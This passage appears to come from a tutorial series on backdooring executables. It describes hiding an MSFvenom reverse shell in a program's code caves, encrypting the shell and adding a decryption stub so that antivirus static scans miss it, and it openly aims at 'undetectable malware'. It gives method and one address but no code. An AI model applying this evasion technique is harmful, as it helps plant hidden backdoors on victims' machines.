This method is based on the previous method. Some antivirus (only one or two, as far as I know) can detect the previous method by the shell signature. Since the instructions that our payload follows to create the reverse shell were obtained from metasploit using MSFvenom, it would be relatively easy for an antivirus to get the code from that payload and detect it in the scans.
The tactic is as follows: we will use two natural code caves. In one we will make a decryption program, and in the other we will have the shell. The idea is to put an encrypted shell so that in a static analysis (which is what the antivirus does) it can not be detected that makes that code. At the moment that we decide of the course of the program, we jump to a function that when executing decrypts the shell, and later we jump to the shell already decrypted.
As the antivirus does not run the program, the shell is undetectable. Let’s see it step by step.
Let’s start from the file we modified in the second part of this series. If you have any doubt, I recommend you to keep an eye on it. From the previous file, what we do is go to where we jump to the code cave, and put the JMP to the second code cave that detected us cave_miner, in my case to the address 00477857:
[…] However, there are still some antivirus programs that detect it. This is because the instructions of the payloads that create a reverse shell are known to some antivirus. They are few, but the idea is to make an undetectable malware, not a little detectable one. I’ll fix this in the next post. […]